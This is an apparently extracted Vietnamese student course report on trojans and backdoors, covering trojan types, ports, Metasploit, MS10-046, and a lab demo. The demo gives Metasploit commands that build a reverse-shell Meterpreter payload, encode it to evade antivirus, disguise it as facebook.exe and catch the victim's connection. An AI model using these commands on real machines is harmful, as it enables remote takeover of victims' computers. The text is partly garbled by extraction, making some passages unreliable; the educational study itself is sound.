Đang tải... (xem toàn văn)
Cùng với sự phát triển của công nghệ thông tin, công nghệ mạng máy tính và sự phát triển của mạng Internet thì các dịch vụ mạng đã có mặt trong hầu hết các lĩnh vực của đời sống xã hội. Các thông tin trên Internet cũng đa dạng về nội dung và hình thức, trong đó có rất nhiều thông tin cần được bảo mật cao hơn bởi tính kinh tế, tính chính xác và độ tin cậy của nó. Bên cạnh sự ra đời và phát triển của công nghệ An ninh Mạng, các hình thức phá họa mạng cũng trở nên tinh vi và phức tạp hơn. Do đó, đối với mỗi hệ thống, nhiệm vụ bảo mật được đặt ra cho người quản trị mạng là hết sức quan trọng và cần thiết. Xuất phát từ những thực tế đó, nhóm chúng em đã tìm hiểu đề tài “Tìm hiểu và xây dựng chương trình minh họa hoạt động của Backdoor” để có thể đưa cái nhìn tổng quan về loại mã độc hại này, từ đó phát triển sang các hướng sâu hơn về mã độc hại nói chung.
HỌC VIỆN KỸ THUẬT MẬT MÃ KHOA AN TỒN THƠNG TIN AT8A-Tháng 9/2014 MƠN HỌC: CƠ SỞ AN TỒN THƠNG TIN Đề tài: Tìm hiểu xây dựng chương trình minh họa hoạt động Backdoor Giảng viên hướng dẫn : Vũ Đình Thu Nhóm thực : Lã Thị Hậu Bùi Thái Dương Lê Anh Đức Nguyễn Tuấn Anh MỤC LỤC 2|Page Tìm hiểu xây dựng chương trình minh họa hoạt động Backdoor Hình 3.1 Kiểm tra IP Hình 3.2 Tạo Backdoor Hình 3.3 Màn hình console exploit Hình 3.4 Thao tác mở cổng, chờ kết nối Hình 3.5 File máy nạn nhân 10 Hình 3.6 Kết nói thiết lập 10 Hình 3.7 Kết thực thi máy nạn nhân 10 DANH MỤC HÌNH ẢNH 3|Page Tìm hiểu xây dựng chương trình minh họa hoạt động Backdoor LỜI MỞ ĐẦU Cùng với phát triển công nghệ thơng tin, cơng nghệ mạng máy tính phát triển mạng Internet dịch vụ mạng có mặt hầu hết lĩnh vực đời sống xã hội Các thông tin Internet đa dạng nội dung hình thức, có nhiều thơng tin cần bảo mật cao tính kinh tế, tính xác độ tin cậy Bên cạnh đời phát triển cơng nghệ An ninh Mạng, hình thức phá họa mạng trở nên tinh vi phức tạp Do đó, hệ thống, nhiệm vụ bảo mật đặt cho người quản trị mạng quan trọng cần thiết Xuất phát từ thực tế đó, nhóm chúng em tìm hiểu đề tài “Tìm hiểu xây dựng chương trình minh họa hoạt động Backdoor” để đưa nhìn tổng quan loại mã độc hại này, từ phát triển sang hướng sâu mã độc hại nói chung CHƯƠNG I: TỔNG QUAN VỀ TROJAN VÀ BACKDOOR Giới thiệu Trojan - Backdoor - Một Trojan chương trình nhỏ chạy chế độ ẩn gây hại cho máy tính 4|Page Tìm hiểu xây dựng chương trình minh họa hoạt động Backdoor - Với trợ giúp Trojan, kẻ tất cơng dễ dàng truy cập vào máy tính nạn nhân để thực số việc nguy hại lấy cắp liệu, xóa file, nhiều khả khác - Khái niệm Backdoor dùng để phần mềm độc hại, tạo để cài, phát tán mã độc vào máy tính người người dùng - Nếu xét khía cạnh chức kỹ thuật, Backdoor giống với hệ thống quản lý điều phối phần mềm Những ứng dụng độc hại tạo để làm yêu cầu mà tin tặc muốn: gửi nhận liệu, kích hoạt, sử dụng xóa file đó, hiển thị thơng báo lỗi, tự khởi động lại máy tính … - Những chương trình thường sử dụng để liên kết nhóm máy tính bị lây nhiễm để tạo nên mơ hình mạng botnet zombie thường gặp Và kẻ đứng đằng sau tổ chức dễ dàng tập trung số lượng lớn lớn máy tính – lúc trở thành công cụ cho tin tặc, nhằm thực âm mưu mục đích xấu - Một phận khác Backdoor có khả lây lan hoạt động giống hệt với Net-Worm, phân biệt chúng qua khả lây lan, Backdoor tự nhân lây lan, trái ngược hoàn toàn với Net-Worm Nhưng cần nhận lệnh đặc biệt từ phía tin tặc, chúng đồng loạt lây lan sản sinh với số lượng khơng thể kiểm sốt Các dạng cách hoạt động Trojan - Kẻ cơng truy cập vào máy tính bị nhiễm Trojan chúng Online - Kẻ cơng truy cập điều khiển tồn máy tính nạn nhân, chúng có khả sử dụng vào nhiều mục đích khác - Các dạng Trojan bản: + Remote Access Trojan – Cho kẻ cơng kiểm sốt tồn hệ thống từ xa + Data-Sending Trojan – Gửi thông tin nhạy cảm cho kẻ công + Destructive Trojan – Phá hủy hệ thống + Denied-of-Service – DoS Attack Trojan: Trojan cho công DoS + Proxy Trojan + HTTP, FTP Trojan: - Trojan tự tạo thành HTTP hay FTP server để kẻ công khai thác lỗi 5|Page Tìm hiểu xây dựng chương trình minh họa hoạt động Backdoor + Security Software Disable Trojan – Có tác dụng tắt tính bảo mật máy tính nạn nhân - Mục đích kẻ viết Trojans: + Lấy thông tin Credit Card + Lấy thông tin tài khoản cá nhân như: Email, Password, Usernames,… + Những liệu mật + Thơng tin tài chính: Tài khoản ngân hàng… + Sử dụng máy tính nạn nhân để thực tác vụ đó, để cơng, scan, hay làm ngập hệ thống mạng nạn nhân Những đường để máy tính nạn nhân nhiễm Trojan - Qua ứng dụng CHAT online IRC – Interney Relay Chat - Qua file đính kèm Mail… - Qua tầng vật lý trao đổi liệu qua USB, CD, HDD - Khi chạy file bị nhiễm Trojan - Qua NetBIOS – FileSharing - Qua chương trình nguy hiểm - Từ trang web không tin tưởng hay website cung cấp phần mềm miễn phí tràn lan mạng - Nó có khả ẩn ứng dụng bình thường, chạy ứng dụng chạy ln Trojan Các Port sử dụng Trojan phổ biến - Back Orifice – Sử dụng UDP protocol – Sử dụng Port 31337 31338 - Deep Throat – Sử dụng UDP protocol – Sử dụng Port 2140 3150 - NetBus – Sử dụng TCP Protocol – Sử dụng Port 12345 12346 - Whack-a-mole – Sử dụng TCP – Qua Port 12361 12362 - Netbus Pro – Sử dụng TCP – Qua Port 20034 - GirlFriend - Sử dụng Protocol TCP – Qua Port 21544 6|Page Tìm hiểu xây dựng chương trình minh họa hoạt động Backdoor CHƯƠNG 2: SYSTEM HACKING Giới thiệu Metasploit - Metasploit dự án bảo mật máy tính cung cấp thơng tin vấn đề lỗ hổng bảo mật giúp đỡ kiểm tra thâm nhập phát triển hệ thống phát công mạng Một dự án tiếng Metasploit Metasploit Framework - Metasploit Framework môi trường dùng để kiểm tra ,tấn công khai thác lỗi service Metasploit xây dựng từ ngôn ngữ hướng đối tượng Perl, với components viết C, assembler, Python Metasploit chạy hầu hết hệ điều hành: Linux, Windows, MacOS - Metasploit gồn thành phần là: + Console interface: dùng lệnh msfconsole Msfconsole interface sử dụng dịng lệnh để cấu hình, kiểm tra nên nhanh mềm dẻo + Web interface: Dùng msfweb giao tiếp với người dùng thông qua giao diện web + Global Enviroment: Được thực thi thông qua câu lệnh setg unsetg, options gán mang tính tồn cục, đưa vào tất module exploits + Temporary Enviroment: thực thi thông qua câu lệnh set unset, enviroment đưa vào module exploit load tại, không ảnh hưởng đến module exploit khác Sử dụng Metaspolit Frameworks Các bước thực sau: 7|Page Tìm hiểu xây dựng chương trình minh họa hoạt động Backdoor - Chọn module exploit - Cấu hình exploit chọn - Kiểm tra cấu hình vừa thiết lập - Lựa chọn mục tiêu - Lựa chọn Payload - Thực thi exploit Payload Meterpreter - Meterpreter, viết tắt từ Meta-Interpreter payload nâng cao có Metasploit Framework Mục đích để cung cấp tập lệnh để khai thác, cơng máy remote computers Nó viết từ developers dạng shared object (DLL) files Meterpreter thành phần mở rộng thực thi nhớ, hồn tồn khơng ghi lên đĩa nên tránh phát từ phần mềm chống virus Các lỗi liên quan đến system hacking - Lỗi MS10-046 (2286198): + Đây lỗi nghiêm trọng liên quan đến Windows Shell cho tất hệ điều hành bị ảnh hưởng, cho phép kẻ cơng chiếm lấy tồn quyền điều khiển Windows thực thi mã nguồn từ xa Lỗi phát vào tháng 06/2010 đến tháng 08/2010, Microsoft tung ba vá lỗi + Lỗi nguy hiểm nằm tập tin "shortcut" (*.lnk) Windows, tập tin thường nằm giao diện desktop hay trình đơn Start Bằng cách tạo tập tin shortcut nhúng mã độc, tin tặc tự động thực thi mã độc người dùng xem tập tin shortcut hay nội dung thư mục chứa tập tin shortcut nhúng mã độc - Lỗi BYPASSUAC: + Từ Windows Vista trở sau, Microsoft giới thiệu tiện ích xây dựng sẵn User Access Control (UAC) UAC làm tăng tính bảo mật Windows cách giới hạn phần mềm ứng dụng nhóm quyền người sử dụng Vì vậy, phần mềm người dùng tin tưởng nhận quyền quản trị, phần mềm khác khơng Tuy nhiên, với tài khoản người quản trị, ứng dụng bị giới hạn tài khoản thường khác 8|Page Tìm hiểu xây dựng chương trình minh họa hoạt động Backdoor + Các hệ điều hành có tích hợp sẵn User Access Control điều bị ảnh hưởng khai thác CHƯƠNG 3: DEMO CHƯƠNG TRÌNH TẠO BACKDOOR VỚI METASPLOIT Mục tiêu - Công cụ sử dụng: Backtrack R3 - Mục tiêu: Sử dụng Backdoor để Remote Windows, dựa nguyên lý hoạt động Backdoor Các bước thực - Bước 1: Sử dùng lệnh ifconfig kiểm tra IP máy Backtrack Ở IP máy acktrack 192.168.1.2 Hình 3.1: Kiểm tra IP - Bước 2: Tạo Backdoor msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c -t exe -x /root/Desktop/facebook.exe Hình 3.2: Tạo Backdoor Trong đó: + LHOST: Địa IP máy Backtrack + LPORT: Cổng máy local 9|Page Tìm hiểu xây dựng chương trình minh họa hoạt động Backdoor + Encode sử dụng shikata_ga_nai, bypass lần + Lưu file Backdoor tên facebook.exe đặt Desktop - Bước 3: Lắng nghe chờ đợi kết nối + Chuyển đến thư mục chứa framework Metasploit, mở hình console để thao tác lệnh cd /pentest/exploits/framework3 msfconsole Hình 3.3: Màn hình console exploit + Thao tác mở cổng, lắng nghe kết nối use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.2 set LPORT 4444 set channel exploit Hình 3.4: Thao tác mở cổng, chờ kết nối - Bước 4: Gửi file sang máy nạn nhân 10 | P a g e Tìm hiểu xây dựng chương trình minh họa hoạt động Backdoor Hình 3.5: File máy nạn nhân - Bước 5: Khi máy nạn nhận thực thi file, kết nối thiết lập Hình 3.6: Kết nối thiết lập - Bước 6: Thi hành vài quyền kiểm soát Hình 3.7: Kết thực thi máy nạn nhân KẾT LUẬN Qua việc nghiên cứu tìm hiểu đề tài, hiểu mối đe dọa an tồn thơng tin, biết thêm kỹ thuật bảo vệ cho 11 | P a g e Tìm hiểu xây dựng chương trình minh họa hoạt động Backdoor hệ thống Trên sở đó, đề tài mở rộng hướng phát triển theo nhiều hướng khác nhau, sâu loại mã độc cụ thể hay khai thác công cụ bảo mật khác Sau nghiên cứu tiểu luận môn học này, nhóm cố gắng khắc phục vấn đề tồn mở rộng đề tài để thiết thực với công việc học tập việc sử dụng máy tính rộng rãi TÀI LIỆU THAM KHẢO - Tấn công Bảo vệ hệ thống – I Train (Tocbatdat) - Backtrack Basic Tutorial – Athena Academy - “Tấn công mã độc” – Trương Minh Nhật Quang (Security BootCamp) - “Viruses” - Client Services – IT Education and Training Team 12 | P a g e Tìm hiểu xây dựng chương trình minh họa hoạt động Backdoor